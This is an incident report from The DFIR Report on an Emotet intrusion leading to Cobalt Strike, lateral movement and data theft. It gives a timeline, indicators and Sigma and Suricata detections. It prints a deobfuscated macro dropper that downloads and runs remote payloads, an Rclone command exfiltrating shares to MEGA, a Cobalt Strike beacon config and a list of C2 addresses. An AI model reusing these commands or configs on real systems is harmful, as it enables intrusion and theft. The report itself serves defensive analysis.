{ "id": "8e843a24-66a5-470f-951d-d1bad403c7c2", "created_at": "2026-04-06T00:07:13.372178Z", "updated_at": "2026-04-10T03:32:50.046674Z", "deleted_at": null, "sha1_hash": "f991ff9f99d7377f2bbe581513b076c4315664ca", "title": "Dead or Alive? An Emotet Story - The DFIR Report", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 10427231, "plain_text": "Dead or Alive? An Emotet Story - The DFIR Report\r\nBy editor\r\nPublished: 2022-09-12 · Archived: 2026-04-02 12:22:00 UTC\r\nIn this intrusion from May 2022, we observed a domain-wide compromise that started from a malware ridden Excel\r\ndocument containing the never-dying malware, Emotet.\r\nThe post-exploitation started very soon after the initial compromise. The threat actors began enumerating the network once\r\nEmotet deployed a Cobalt Strike beacon on the beachhead host. After three days of discovery and lateral movement, the\r\nthreat actors exfiltrated sensitive data using Rclone before leaving the network.\r\nAfter a successful takedown thanks to Interpol and Eurojust efforts, Emotet was resurrected in November 2021 with the help\r\nof Trickbot malware. Since then, Emotet has been testing different initial access payloads while its developers were busy\r\nimproving the core functionality of the actual malware. Since January 2022 we observed an increase in the activity of Cobalt\r\nStrike deployments following Emotet intrusions.\r\nIn a few weeks, we’ll have another Emotet report out from June, where the intrusion used similar TTPs and ended in\r\nransomware.\r\nCase Summary\r\nBack in May, we witnessed an intrusion that started from a phishing email which included Emotet. The intrusion lasted four\r\ndays and contained many of the usual suspects, including the Cobalt Strike post-exploitation framework.\r\nThe Emotet infection was delivered using a xls file containing a malicious macro, a technique that has been on the wane in\r\nrecent months. After executing the Emotet malware, it ran a few basic Windows discovery commands (systeminfo, ipconfig,\r\netc.), wrote a registry run key for persistence, and made its initial call outs to the command and control servers.\r\nAround 40 minutes after the initial execution, the Emotet malware started to run a new Emotet email spreader campaign.\r\nThis entailed connecting to various email servers and sending new emails with attached xls and zip files. This activity\r\ncontinued until the UTC clock turned over to the next day; at which point, the email spreader halted for a period of time and\r\naround seven hours into the second day, it began running the email spreader again.\r\nAround 26 hours after the initial infection, while still running the email spreader, the Emotet malware pulled down and\r\nexecuted a Cobalt Strike payload on the beachhead host. Right after the beacon was executed, the threat actors began\r\nenumerating the network using native Windows binaries and the PowerView module, Invoke-ShareFinder. Around 30\r\nminutes after dropping the beacon the threat actor injected into a dllhost.exe process and then proceeded to dump credentials\r\nfrom LSASS. Another 20 minutes later, the threat actor ran Invoke-ShareFinder again and Invoke-Kerberoast.\r\nAt 29 hours from initial access, the threat actors began their first lateral movement. This was achieved by transferring a\r\nCobalt Strike DLL over SMB and executing via a remote service on another workstation. From there, they ran Invoke-Sharefinder once again, along with AdFind, using a batch file named find.bat. Pass-the-Hash behavior was observed\r\ntargeting several accounts on the lateral host. Use of Cobalt Strike’s Get-System module was also apparent via the logs.\r\nThe threat actors then proceeded to do additional network discovery using a batch script named p.bat to ping all servers in\r\nthe network. More account discovery was then observed, with queries for Domain Administrators and a backup account.\r\nAt 31 hours into the intrusion, the threat actors pivoted to the Domain Controller using the same Cobalt Strike DLL. Once\r\non the Domain Controller, the threat actors again used Get-System to elevate and then dumped LSASS. After completing\r\nthat activity, the threat actors chose another server to push a file, 1.msi, to, which was the installation package for Atera–for\r\nan additional means of persistence and command and control. During this whole second day, the original Emotet infection\r\non the beachhead host was still trying to send more malicious emails, finally stopping for the day a little before 23:00 UTC.\r\nThey returned the next day, at the same time as the previous day, and picked up where they left off. They pivoted to a couple\r\nof workstations on the network using Cobalt Strike and installed Atera and Splashtop with a different MSI installer. Once\r\nagain, they executed Invoke-Sharefinder, AdFind, and the p.bat batch script to ping online servers. Using the remote admin\r\ntools, they used Rclone to exfiltrate important data from a file server and upload it to MEGA. Interestingly, the threat actors\r\nexfiltrated the same data twice while running Rclone with the parameter –ignore-existing from two different hosts on the\r\nnetwork. Around 20:00 UTC the Emotet infection on the beachhead host began its email spreader activity again, only to halt\r\nat the change over at 00:00 UTC.\r\nOn the last day of this intrusion, the threat actors returned during their normal working hours and used Rclone to exfiltrate\r\nIT-related data from a separate server. This was the last activity we observed from this group. These cases commonly end up\r\nwith ransomware in addition to data exfiltration. This, however, was not the case with this intrusion as the threat actors were\r\nevicted before any final actions could be taken.\r\nhttps://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\r\nPage 1 of 23\n\nServices\r\nWe offer multiple services including a Threat Feed service which tracks Command and Control frameworks such as Cobalt\r\nStrike, BumbleBee, Covenant, Metasploit, Empire, PoshC2, etc. More information on this service and others can be\r\nfound here.\r\nWe also have artifacts and IOCs available from this case such as pcaps, memory captures, files, event logs including\r\nSysmon, Kape packages, and more, under our Security Researcher and Organization services.\r\nTimeline\r\nhttps://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\r\nPage 2 of 23\n\nAnalysis and reporting completed by @Kostastsale and @IcsNick\r\nInitial Access\r\nThe threat actor gained access to the environment after a user opened an Excel document and enabled macros. The\r\ndocument came in via email in the form of a zip file which included an xls file. Thanks for sharing @proxylife!\r\nhttps://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\r\nPage 3 of 23\n\nThe document contains hidden sheets, has white characters on a white background, and is attributed to SilentBuilder with\r\nEmotet, epoch5.\r\nTo deobfuscate the document the tool xlmdeobfuscator was used with the following output.\r\nAfter deobfuscation and cleaned up, the code in the macro looks as follows.\r\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCBB\",0,\"http[:]//praachichemfood[.]com/wp-content/Mwmos/\",\"..\\hvxda.oc\r\n=IF(JRSJG1\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCBB\",0,\"https[:]//lopespublicidade[.]com/cgi-bin/e5R5oG4iE\r\n=IF(JRSJG2\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCBB\",0,\"https[:]//bosny[.]com/aspnet_client/rnMp0ofR/\",\".\r\n=IF(JRSJG3\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCBB\",0,\"http[:]//seasidesolutions[.]com/cgi-bin/WLoO6sEzYC\r\n=IF(JRSJG4\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCBB\",0,\"http[:]//borgelin[.]org/belzebub/okwRWz1C/\",\"..\\hv\r\nhttps://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\r\nPage 4 of 23\n\n=IF(JRSJG5\u003c0, CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCBB\",0,\"http[:]//loa-hk[.]com/wp-content/ffBag/\",\"..\\hvxd\r\n=IF(JRSJG6\u003c0, CLOSE(0),)\r\n=EXEC(\"C:\\Windows\\System32\\regsvr32.exe ..\\hvxda.ocx\")\r\n=R\r\nExecution\r\nEmotet Execution\r\nThe execution is done from an Excel document using regsvr32.exe with the payload, hvxda.ocx, that is a DLL file with the\r\nname of random characters, llJyMIOvft.dll . Worth noting, the Excel document failed to download the second payload from\r\na few of the embedded URLs.\r\nA new file is then created in C:\\%USERPROFILE%\\AppData\\Local\\ with a folder that also consists of random characters.\r\nCobalt Strike Execution\r\nThe Emotet DLL is then used to download Cobalt Strike, which is then injected into svchost and dllhost.\r\nSysmon showing Emotet starting the Cobalt Strike executable.\r\nA great way to get the Malleable profile (and additional beacon config), is to use Didier Stevens’s fantastic tool 1768.py.\r\nHere, the tool is used with a process dump of the executable.\r\nhttps://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\r\nPage 5 of 23\n\nPersistence\r\nThe Emotet malware infection on the beachhead host used a registry run key to maintain persistence.\r\nThis registry key activity (Sysmon EventID 12 \u0026 13) was observed continuously on the beachhead host for the first few\r\ndays of the intrusion.\r\nBeyond the beachhead host, the threat actor deployed several Atera/Splashtop remote access tools across the environment as\r\nan alternative means of access to the environment should they lose access to their Cobalt Strike beacons.\r\nPrivilege Escalation\r\nUse of Cobalt Strike’s Get-System named pipe technique was observed on the Domain Controller and other hosts to elevate\r\nto System privileges.\r\nDefense Evasion\r\nProcess injection was observed during the intrusion by both Emotet and Cobalt Strike. Emotet injected multiple times into\r\nsvchost to execute certain functions, including discovery commands.\r\nhttps://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\r\nPage 6 of 23\n\nCobalt Strike used process hollowing to launch under the context of the Dllhost.exe process. We later saw Dllhost.exe\r\ninjecting into multiple other processes, such as explorer.exe and svchost.exe, to execute further payloads.\r\nScanning process memory across affected hosts reveals both the direct Cobalt Strike processes and the injected processes\r\nusing the Malpedia yara rule.\r\n.Pid .ProcessName .CommandLine .Rule\r\n4616 svchost.exe C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup -s CDPUserSvc win_cobalt_strike_auto\r\n4844 svchost.exe C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup -s WpnUserService win_cobalt_strike_auto\r\n10256 UOmCgbXygCe.exe “C:\\Users\\USER\\AppData\\Local\\FrlxbduRbdVAbVbS\\UOmCgbXygCe.exe” win_cobalt_strike_auto\r\n836 svchost.exe C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p win_cobalt_strike_auto\r\n1008 svchost.exe C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p -s LSM win_cobalt_strike_auto\r\n9308 regsvr32.exe regsvr32 C:\\ProgramData\\1.dll win_cobalt_strike_auto\r\n1056 svchost.exe C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted -p win_cobalt_strike_auto\r\n1428 svchost.exe C:\\Windows\\system32\\svchost.exe -k ICService -p win_cobalt_strike_auto\r\n6036 regsvr32.exe regsvr32 C:\\ProgramData\\1.dll win_cobalt_strike_auto\r\nCredential Access\r\nFrom the beachhead host credentials appear to have been dumped from an injection into the SearchIndexer process on the\r\nhost. Data observed using sysmon event id 10 shows the use of the SearchIndexer process, similar to behavior observed in a\r\nprior case, followed by known Cobalt Strike malleable profile named pipes.\r\nEventID: 10\r\nSourceImage: C:\\Windows\\system32\\SearchIndexer.exe\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 136208\r\nCallTrace:\r\nC:\\Windows\\SYSTEM32\\ntdll.dll+9d1e4|C:\\Windows\\System32\\KERNELBASE.dll+2bcbe|C:\\Program Files\\Common Files\\Mic\r\nEventID: 17\r\nEventType: CreatePipe\r\nImage: C:\\Windows\\system32\\SearchIndexer.exe\r\nPipeName: \\SearchTextHarvester\r\nShortly after the credential dump using the SearchIndexer process, the Cobalt Strike process ran Invoke-Kerberoast looking\r\nfor roastable accounts within the organization.\r\nhttps://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\r\nPage 7 of 23\n\nWe observed Cobalt Strike beacons accessing LSASS on multiple occasions, on almost every compromised host.\r\nDiscovery\r\nOn the first day of the intrusion, the Emotet malware performed some basic discovery tasks on the host using built in\r\nWindows utilities.\r\nsysteminfo\r\nipconfig /all\r\nOn the second day, the hands on activity from Cobalt Strike performed a more thorough examination of that host’s Windows\r\ndomain.\r\nhttps://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\r\nPage 8 of 23\n\nC:\\Windows\\system32\\cmd.exe /C net group \"Domain Computers\" /domain\r\nC:\\Windows\\system32\\cmd.exe /C net group /domain \"Domain Admins\"\r\nC:\\Windows\\system32\\cmd.exe /C net group /domain \"Enterprise Admins\"\r\nC:\\Windows\\system32\\cmd.exe /C systeminfo\r\nC:\\Windows\\system32\\cmd.exe /C net users\r\nC:\\Windows\\system32\\cmd.exe /C nltest /DOMAIN_TRUSTS\r\nThe threat actors launched the PowerView module, Invoke-Sharefinder, from almost all of the hosts to which they pivoted,\r\nincluding the domain controller.\r\nAdFind.exe, the command-line Active Directory query tool, was run on only one of the compromised hosts via the find.bat\r\nbatch script. The contents of the script are below:\r\nfind.exe -f \"(objectcategory=person)\" \u003e ad_users.txt\r\nfind.exe -f \"objectcategory=computer\" \u003e ad_computers.txt\r\nfind.exe -f \"(objectcategory=organizationalUnit)\" \u003e ad_ous.txt\r\nfind.exe -sc trustdmp \u003e trustdmp.txt\r\nfind.exe -subnets -f (objectCategory=subnet)\u003e subnets.txt\r\nfind.exe -f \"(objectcategory=group)\" \u003e ad_group.txt\r\nfind.exe -gcb -sc trustdmp \u003e trustdmp.txt\r\necho end\r\nUsing the data collected from previous activity, they created a target list which was then fed to a batch script named p.bat.\r\nThe batch file contained one line, which pinged a list of servers (servers.txt). The line can be seen below:\r\nfor /f %%i in (SERVERS.txt) do ping %%i -n 1 \u003e\u003e res.txt\r\nhttps://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\r\nPage 9 of 23\n\nAdditionally, the threat actors displayed the share directories using dir.exe via the interactive shell from the Cobalt Strike\r\nbeacon.\r\nLateral Movement\r\nThe Cobalt Strike jump psexec (Run service EXE on the remote host) produced a 7045 System Windows event on remote\r\nhosts. Example:\r\nBelow, the network traffic shows the SMB lateral transfer of one of the Atera Agent MSI installers (1.msi) used to gain\r\naccess laterally on a host and provide persistence for later access.\r\nThe same can be observed for other payloads used during the intrusion as well; here we can see that same data using Zeek\r\nlogs when the threat actors transferred the 1.dll Cobalt Strike beacon laterally to gain access to additional hosts.\r\nWe also observed Pass-The-Hash used throughout the intrusion via the Cobalt Strike Beacons. Threat actors used PTH to\r\nacquire a session with elevated user access. We observed the below logs being generated on the source host and domain\r\ncontroller that indicate the use of PTH.\r\nSource Host:\r\n- Windows EID 4624\r\nLogon Type = 9\r\nAuthentication Package = Negotiate\r\nLogon Process = seclogo\r\n- Windows EID 467\r\nhttps://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\r\nPage 10 of 23\n\nDomain Controller:\r\n- Windows EID 4776\r\n You can read more about detecting “Pass-The-Hash” here by Stealthbits and here by Hausec.\r\nCommand and Control\r\nEmotet\r\nIn the Emotet Excel document, the following URLs are hard coded, and obfuscated, to download the second stage.\r\nhttps[:]//lopespublicidade[.]com/cgi-bin/e5R5oG4iEaQnxQrZDh/\r\nhttps[:]//bosny[.]com/aspnet_client/rnMp0ofR/\r\nhttp[:]//seasidesolutions[.]com/cgi-bin/WLoO6sEzYCJ3LTlC/\r\nhttp[:]//borgelin[.]org/belzebub/okwRWz1C/\r\nhttp[:]//loa-hk[.]com/wp-content/ffBag/\r\nThe second stage of Emotet has a set of hard-coded IPs that it tries to connect to after the DLL is executed.\r\nhxxps[://]103[.]133[.]214[.]242/\r\nhxxps[://]103[.]133[.]214[.]242:8080/\r\nhxxps[://]103[.]41[.]204[.]169/\r\nhxxps[://]103[.]41[.]204[.]169:8080/\r\nhxxps[://]103[.]42[.]58[.]120/\r\nhxxps[://]103[.]42[.]58[.]120:7080/\r\nhxxps[://]103[.]56[.]149[.]105/\r\nhxxps[://]103[.]56[.]149[.]105:8080/\r\nhxxps[://]103[.]8[.]26[.]17/\r\nhxxps[://]103[.]8[.]26[.]17:8080/\r\nhxxps[://]104[.]248[.]225[.]227/\r\nhxxps[://]104[.]248[.]225[.]227:8080/\r\nhxxps[://]110[.]235[.]83[.]107/\r\nhxxps[://]110[.]235[.]83[.]107:7080/\r\nhxxps[://]116[.]124[.]128[.]206/\r\nhxxps[://]116[.]124[.]128[.]206:8080/\r\nhxxps[://]118[.]98[.]72[.]86/\r\nhxxps[://]134[.]122[.]119[.]23/\r\nhxxps[://]134[.]122[.]119[.]23:8080/\r\nhxxps[://]139[.]196[.]72[.]155:8080/\r\nhxxps[://]159[.]69[.]237[.]188/\r\nhxxps[://]175[.]126[.]176[.]79/\r\nhxxps[://]175[.]126[.]176[.]79:8080/\r\nhxxps[://]178[.]62[.]112[.]199/\r\nhxxps[://]178[.]62[.]112[.]199:8080/\r\nhxxps[://]185[.]148[.]168[.]220/\r\nhxxps[://]185[.]148[.]168[.]220:8080/\r\nhxxps[://]188[.]225[.]32[.]231/\r\nhxxps[://]188[.]225[.]32[.]231:4143/\r\nhxxps[://]190[.]90[.]233[.]66/\r\nhxxps[://]194[.]9[.]172[.]107/\r\nhxxps[://]194[.]9[.]172[.]107:8080/\r\nhxxps[://]195[.]154[.]146[.]35/\r\nhxxps[://]195[.]77[.]239[.]39/\r\nhxxps[://]195[.]77[.]239[.]39:8080/\r\nhxxps[://]196[.]44[.]98[.]190/\r\nhttps://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\r\nPage 11 of 23\n\nhxxps[://]196[.]44[.]98[.]190:8080/\r\nhxxps[://]202[.]134[.]4[.]210/\r\nhxxps[://]202[.]134[.]4[.]210:7080/\r\nhxxps[://]202[.]28[.]34[.]99/\r\nhxxps[://]202[.]28[.]34[.]99:8080/\r\nhxxps[://]202[.]29[.]239[.]162/\r\nhxxps[://]203[.]153[.]216[.]46/\r\nhxxps[://]207[.]148[.]81[.]119/\r\nhxxps[://]207[.]148[.]81[.]119:8080/\r\nhxxps[://]210[.]57[.]209[.]142/\r\nhxxps[://]210[.]57[.]209[.]142:8080/\r\nhxxps[://]217[.]182[.]143[.]207/\r\nhxxps[://]36[.]67[.]23[.]59/\r\nhxxps[://]37[.]44[.]244[.]177/\r\nhxxps[://]37[.]44[.]244[.]177:8080/\r\nhxxps[://]37[.]59[.]209[.]141/\r\nhxxps[://]37[.]59[.]209[.]141:8080/\r\nhxxps[://]45[.]71[.]195[.]104:8080/\r\nhxxps[://]5[.]56[.]132[.]177:8080/\r\nhxxps[://]51[.]68[.]141[.]164:8080/\r\nhxxps[://]54[.]37[.]106[.]167:8080/\r\nhxxps[://]54[.]37[.]228[.]122/\r\nhxxps[://]54[.]38[.]143[.]246/\r\nhxxps[://]54[.]38[.]143[.]246:7080/\r\nhxxps[://]54[.]38[.]242[.]185/\r\nhxxps[://]59[.]148[.]253[.]194/\r\nhxxps[://]62[.]171[.]178[.]147:8080/\r\nhxxps[://]66[.]42[.]57[.]149/\r\nhxxps[://]68[.]183[.]91[.]111/\r\nhxxps[://]68[.]183[.]91[.]111:8080/\r\nhxxps[://]68[.]183[.]93[.]250/\r\nhxxps[://]78[.]46[.]73[.]125/\r\nhxxps[://]78[.]47[.]204[.]80/\r\nhxxps[://]85[.]214[.]67[.]203/\r\nhxxps[://]85[.]214[.]67[.]203:8080/\r\nhxxps[://]85[.]25[.]120[.]45/\r\nhxxps[://]85[.]25[.]120[.]45:8080/\r\nhxxps[://]87[.]106[.]97[.]83/\r\nhxxps[://]87[.]106[.]97[.]83:7080/\r\nhxxps[://]88[.]217[.]172[.]165/\r\nhxxps[://]88[.]217[.]172[.]165:8080/\r\nhxxps[://]93[.]104[.]209[.]107/\r\nhxxps[://]93[.]104[.]209[.]107:8080/\r\nCobalt Strike\r\nEmotet, later on, deployed Cobalt Strike for additional functionality.\r\n59.95.98.204\r\nJA3: 72a589da586844d7f0818ce684948eea\r\nJA3S: f176ba63b4d68e576b5ba345bec2c7b7\r\nCertificate: [66:f7:4c:f9:56:5d:fe:15:a6:8c:62:b9:3d:72:cb:8e:c9:e9:89:02]\r\nNot Before: 2022/05/19 12:22:46 UTC\r\nNot After: 2023/05/19 12:22:46 (UTC)\r\nIssuer Org: jQuery\r\nSubject Common: jquery.com\r\n{\r\n \"beacontype\": [\r\n \"HTTP\"\r\n ],\r\n \"sleeptime\": 45000,\r\n \"jitter\": 37,\r\n \"maxgetsize\": 1403644,\r\n \"spawnto\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"license_id\": 206546002,\r\n \"cfg_caution\": false,\r\n \"kill_date\": null,\r\n \"server\": {\r\nhttps://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\r\nPage 12 of 23\n\n\"hostname\": \"59.95.98.204\",\r\n \"port\": 8080,\r\n \"publickey\": \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCfWiK6EPk2D2Ho7CBgdUfK2kqa/1x2L0Tt0R4Pl/Sof+7skIOqclxG\r\n },\r\n \"host_header\": \"\",\r\n \"useragent_header\": null,\r\n \"http-get\": {\r\n \"uri\": \"/jquery-3.3.1.min.js\",\r\n \"verb\": \"GET\",\r\n \"client\": {\r\n \"headers\": null,\r\n \"metadata\": null\r\n },\r\n \"server\": {\r\n \"output\": [\r\n \"print\",\r\n \"append 1522 characters\",\r\n \"prepend 84 characters\",\r\n \"prepend 3931 characters\",\r\n \"base64url\",\r\n \"mask\"\r\n ]\r\n }\r\n },\r\n \"http-post\": {\r\n \"uri\": \"/jquery-3.3.2.min.js\",\r\n \"verb\": \"POST\",\r\n \"client\": {\r\n \"headers\": null,\r\n \"id\": null,\r\n \"output\": null\r\n }\r\n },\r\n \"tcp_frame_header\": \"AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"crypto_scheme\": 0,\r\n \"proxy\": {\r\n \"type\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"behavior\": \"Use IE settings\"\r\n },\r\n \"http_post_chunk\": 0,\r\n \"uses_cookies\": true,\r\n \"post-ex\": {\r\n \"spawnto_x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\",\r\n \"spawnto_x64\": \"%windir%\\\\sysnative\\\\dllhost.exe\"\r\n },\r\n \"process-inject\": {\r\n \"allocator\": \"NtMapViewOfSection\",\r\n \"execute\": [\r\n \"CreateThread 'ntdll!RtlUserThreadStart'\",\r\n \"CreateThread\",\r\n \"NtQueueApcThread-s\",\r\n \"CreateRemoteThread\",\r\n \"RtlCreateUserThread\"\r\n ],\r\n \"min_alloc\": 17500,\r\n \"startrwx\": false,\r\n \"stub\": \"yl5rgAigihmtjA5iEHURzg==\",\r\n \"transform-x86\": [\r\n \"prepend '\\\\x90\\\\x90'\"\r\n ],\r\n \"transform-x64\": [\r\n \"prepend '\\\\x90\\\\x90'\"\r\n ],\r\n \"userwx\": false\r\n },\r\n \"dns-beacon\": {\r\n \"dns_idle\": null,\r\n \"dns_sleep\": null,\r\n \"maxdns\": null,\r\nhttps://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\r\nPage 13 of 23\n\n\"beacon\": null,\r\n \"get_A\": null,\r\n \"get_AAAA\": null,\r\n \"get_TXT\": null,\r\n \"put_metadata\": null,\r\n \"put_output\": null\r\n },\r\n \"pipename\": null,\r\n \"smb_frame_header\": \"AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"stage\": {\r\n \"cleanup\": true\r\n },\r\n \"ssh\": {\r\n \"hostname\": null,\r\n \"port\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"privatekey\": null\r\n }\r\n}\r\nAtera and Splashtop\r\nThreat actors used Atera and Splashtop remote access tools on two compromised hosts during the intrusion. Atera granted\r\nthe threat actors with interactive access. We cannot, however, confirm that the threat actors utilized this access because the\r\nmajority of activity originated through the Cobalt Strike beacons.\r\nExfiltration\r\nThe threat actors used Rclone to exfiltrate sensitive data to MEGA.io cloud storage. Command line logging revealed the\r\ndestination to be the Mega service and the network shares targeted.\r\nrclone.exe, copy, \\\\REDACTED\\Shares, mega:Shares, -q, --ignore-existing, --auto-confirm, --multi-thread-stream\r\nThis activity was also visible on the network via Zeek logs showing the SMB share connection activity.\r\nActions on Objectives\r\nhttps://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\r\nPage 14 of 23\n\nEmotet has for some time been used as an initial access broker for various intrusions; however, some Emotet infections get\r\ntasked with continuing the delivery of new campaigns. In this intrusion, we observed both tasks occurring during the same\r\ntime with both the delivery of access to the threat actor utilizing Cobalt Strike and exfiltrating data from the network, all the\r\nwhile, the original Emotet malware was tasked to deliver new malicious emails.\r\nThe Emotet mailer started roughly once each day during the intrusion. Marked by bursts of connection to various email\r\nservers.\r\nThe emails were sent through various compromised email accounts, propagating additional malicious xls files to further\r\npropagate Emotet access.\r\nhttps://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\r\nPage 15 of 23\n\nWe did not see any further activity but we believe if given enough time, this would have ended with domain wide\r\nransomware. We have a case coming up in a few weeks where it does exactly that.\r\nIndicators\r\nFile:\r\ninfo_1805.xls\r\nacd3d4e8f63f52eaf57467a76ca2389d\r\n4a42b5e7e7fd43ddefc856f45bb95d97656ddca6\r\ne598b9700e13f2cb1c30c6d9230152ed5716a6d6e25db702576fefeb6638005e\r\n1.dll\r\n27d0b9e38cdc9a31fa9271c0bbf5d393\r\ne96980812c287c9d27be9181bcf08727cc9f457a\r\n1b9c9e4ed6dab822b36e3716b1e8f046e92546554dff9bdbd18c822e18ab226b\r\nhttps://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\r\nPage 16 of 23\n\nfind.bat\r\nc96b2b5b52ef0013b841d136ddab0f49\r\n22cc2bc032ae327de9f975e9122b692e4474ac15\r\n5a5c601ede80d53e87e9ccb16b3b46f704e63ec7807e51f37929f65266158f4c\r\np.bat\r\nadf2b487134ffcd7999e419318dfdf8d\r\n91c54877440d14538be22d662e7f47e29ab219bf\r\nfd72a9313f8564b57ebd18791a438216d289d4a97df3f860f1fc585a001265d9\r\nllJyMIOvft.dll\r\ne984f812689ec7af136a151a19b2d56c\r\n88591ad3806c0a1e451c744d4942e99e9a5d2ff7\r\n2b2e00ed89ce6898b9e58168488e72869f8e09f98fecb052143e15e98e5da9df\r\nUOmCgbXygCe.exe\r\n592155bbbab05ac1f818cfd9eb53b672\r\n82070d19c26e0f7e255168e1f2364174215aa0de\r\nf4c085ef1ba7e78a17a9185e4d5e06163fe0e39b6b0dc3088b4c1ed11c0d726b\r\nNetwork:\r\nCobalt Strike:\r\n59.95.98.204:8080\r\nhttp://59.95.98.204:8080/jquery-3.3.1.min.js\r\nEmotet:\r\n103.8.26.17:8080\r\n134.122.119.23:8080\r\n54.38.143.246:7080\r\n202.29.239.162:443\r\nDetections\r\nNetwork\r\nSuricata rules:\r\nET DROP Spamhaus DROP Listed Traffic Inbound group 13\r\nET CNC Feodo Tracker Reported CnC Server group 9\r\nET CNC Feodo Tracker Reported CnC Server group 12\r\nET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2\r\nET MALWARE Cobalt Strike Beacon Activity (GET)\r\nET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response\r\nET MALWARE Cobalt Strike Activity (POST)\r\nET CNC Feodo Tracker Reported CnC Server group 22\r\nET POLICY SMB Executable File Transfer\r\nET RPC DCERPC SVCCTL - Remote Service Control Manager Access\r\nET CNC Feodo Tracker Reported CnC Server group 24\r\nET MALWARE W32/Emotet CnC Beacon 3\r\nSigma\r\nhttps://github.com/The-DFIR-Report/Sigma-Rules/blob/main/ateraagent_malicious_installations.yml\r\ntitle: AteraAgent malicious installations\r\nid: fb0f2d48-269d-473e-9afc-c540a16a990f\r\ndescription: Detects potentially malicious AteraAgent installations when the IntegratorLogin parameter is used\r\nstatus: experimental\r\ndate: 2022/09/12\r\nauthor: '@kostastsale, @TheDFIRReport'\r\nlogsource:\r\n category: process_creation\r\n product: windows\r\ndetection:\r\nhttps://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\r\nPage 17 of 23\n\nselection1:\r\n Image:\r\n - '*\\AteraAgent.exe'\r\n CommandLine|contains|all:\r\n - '/i '\r\n - 'IntegratorLogin='\r\n selection2:\r\n CommandLine|contains:\r\n # Feel free to modify the email addresses to fit your needs\r\n - '@gmail.com'\r\n - '@hotmail.com'\r\n - '@hotmail.com'\r\n - '@yandex.ru'\r\n - '@mail.ru'\r\n - '@outlook.com'\r\n - '@protonmail.com'\r\n - '@dropmail.me'\r\n condition: selection1 and selection2\r\nfalsepositives:\r\n - Unlikely\r\nlevel: high\r\ntags:\r\n - attack.execution\r\n - attack.T1059.006\r\nhttps://github.com/The-DFIR-Report/Sigma-Rules/blob/main/rclone_smb_share_exfiltration.yml\r\ntitle: Rclone SMB Share Exfiltration\r\nid: 889bc648-5164-44f4-9388-fb5d6b58a7b2\r\nstatus: Experimental\r\ndescription: Detection of a exfiltration activity using rclone from Windows network shares using SMB.\r\nauthor: \\@TheDFIRReport\r\ndate: 2022/09/12\r\nreferences:\r\n - https://thedfirreport.com/\r\nlogsource:\r\n product: zeek\r\n service: smb_files\r\ndetection:\r\n selection:\r\n file_name|endswith:\r\n - '\\rclone.exe'\r\n condition: selection\r\nfalsepositives:\r\n - Approved business backup processes.\r\nlevel: medium\r\ntags:\r\n - attack.exfiltration\r\n - attack.t567.002\r\nhttps://github.com/The-DFIR-Report/Sigma-Rules/blob/main/potential_smb_dll_lateral_movement.yml\r\ntitle: Potential SMB DLL Lateral Movement\r\nid: 8fe1524e-8c97-404c-9dee-090929a315c4\r\nstatus: Experimental\r\ndescription: Detection of potential us of SMB to transfer DLL's into the ProgramData folder of hosts for purpo\r\nauthor: \\@TheDFIRReport\r\ndate: 2022/09/12\r\nreferences:\r\n - https://thedfirreport.com/\r\nlogsource:\r\n product: zeek\r\n service: smb_files\r\ndetection:\r\n selection_1:\r\n file_name|contains:\r\n - 'programdata'\r\n selection_2:\r\n file_name|endswith:\r\nhttps://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\r\nPage 18 of 23\n\n- '\\.dll'\r\n condition: selection_1 and selection_2\r\nfalsepositives:\r\n - RMM Tools and Administrative activities in ProgramData Folder.\r\nlevel: medium\r\ntags:\r\n - attack.lateral_movement\r\n - attack.t1570\r\nhttps://github.com/SigmaHQ/sigma/blob/8b749fb1260b92b9170e4e69fa1bd2f34e94d766/rules/windows/builtin/security/win_security_smb_file_cr\r\nYara\r\nhttps://github.com/The-DFIR-Report/Yara-Rules/blob/main/case_14335.yar\r\n/*\r\nYARA Rule Set\r\nAuthor: The DFIR Report\r\nDate: 